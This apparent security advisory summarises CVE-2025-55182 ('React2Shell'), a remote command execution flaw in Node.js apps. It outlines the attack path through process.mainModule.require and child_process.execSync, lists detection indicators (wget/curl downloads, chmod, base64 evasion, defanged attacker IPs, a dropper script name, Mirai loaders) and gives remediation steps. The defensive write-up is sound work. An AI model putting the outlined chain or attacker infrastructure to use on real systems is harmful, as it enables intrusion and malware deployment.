Full Report
Shortly after details of CVE-2025-55182 became public, we began noticing large volumes of exploitation attempts across our endpoint and network sensors. The vulnerability, informally referred to as React2Shell, affects Node.js applications that allow user-supplied JSON data to influence internal JavaScript object structures. When improperly validated, attackers can escalate this into remote command execution through access to process.mainModule.require and, subsequently, child_process.execSync.
Analysis Summary
# Vulnerability: React2Shell - Remote Code Execution in Node.js Applications
## CVE Details
- CVE ID: CVE-2025-55182
- CVSS Score: Not explicitly provided, but implied High severity due to RCE.
- CWE: Likely Prototype Pollution or Improper Input Validation leading to Injection (CWE-20/CWE-944 - Awaiting official CWE assignment)
## Affected Systems
- Products: Node.js applications that process user-supplied JSON data without proper validation.
- Versions: Any version exhibiting this specific improper validation pattern involving JSON influencing internal JavaScript object structures.
- Configurations: Applications that expose endpoints accepting user-supplied JSON input that is then used to manipulate internal objects, allowing access to `process.mainModule.require`.
## Vulnerability Description
This vulnerability, informally named "React2Shell," resides in Node.js applications where user-supplied JSON data is poorly validated, allowing attackers to manipulate internal JavaScript object structures (likely via Prototype Pollution or deserialization flaws). Successful exploitation grants the attacker access to `process.mainModule.require`, which can then be leveraged to call `child_process.execSync`, resulting in unauthenticated Remote Command Execution (RCE).
## Exploitation
- Status: Exploited in the wild (Large volumes of exploitation attempts observed across endpoint and network sensors shortly after disclosure).
- Complexity: Low (Described as simple to weaponize, affecting a large class of applications).
- Attack Vector: Network (Exploitation occurs via web requests containing malicious JSON).
## Impact
- Confidentiality: High (Allows code execution, leading to data theft).
- Integrity: High (Allows arbitrary command execution and system compromise).
- Availability: High (Used to deploy malware/miners, potentially leading to service disruption).
## Remediation
### Patches
- No specific vendor patches (e.g., specific Node.js versions or framework updates) are listed in this context. **Developer action is required** to fix the JSON parsing and validation logic in their specific applications.
### Workarounds
1. **Input Validation:** Immediately review and implement strict validation on all user-supplied JSON data to prevent structural manipulation (e.g., prototype pollution).
2. **Network Segmentation:** Reduce exposure by placing vulnerable services behind firewalls or in segmented networks.
3. **Disable Remote Access:** Disable unnecessary remote access capabilities on interconnected devices.
## Detection
- Indicators of Compromise (IoCs):
- Execution of `BusyBox` commands.
- Use of `wget` or `curl` for file download attempts in web application contexts.
- Use of `chmod` to modify permissions shortly after exploitation.
- Discovery of traffic involving base64 decoding sequences aimed at evading filters.
- Payloads attempting to retrieve components from IP addresses like `193.34.213[.]150` or `41.231.37[.]153`.
- Detection Methods and Tools: Monitor endpoint and network sensors for command injection signatures matching payload patterns (e.g., calls to `child_process.execSync` derived from HTTP requests) or the specific command strings seen in dropped malware (`rondo.aqu.sh` or Mirai loaders).
## References
- Vendor Advisories: Deep-dive blog post available at `hxxp://www.bitdefender.com/en-us/blog/businessinsights/advisory-react2shell-critical-unauthenticated-rce-in-react-cve-2025-55182`
- Relevant Links:
- General Information: `hxxp://www.bitdefender.com/en-us/blog/labs/cve-2025-55182-exploitation-hits-the-smart-home`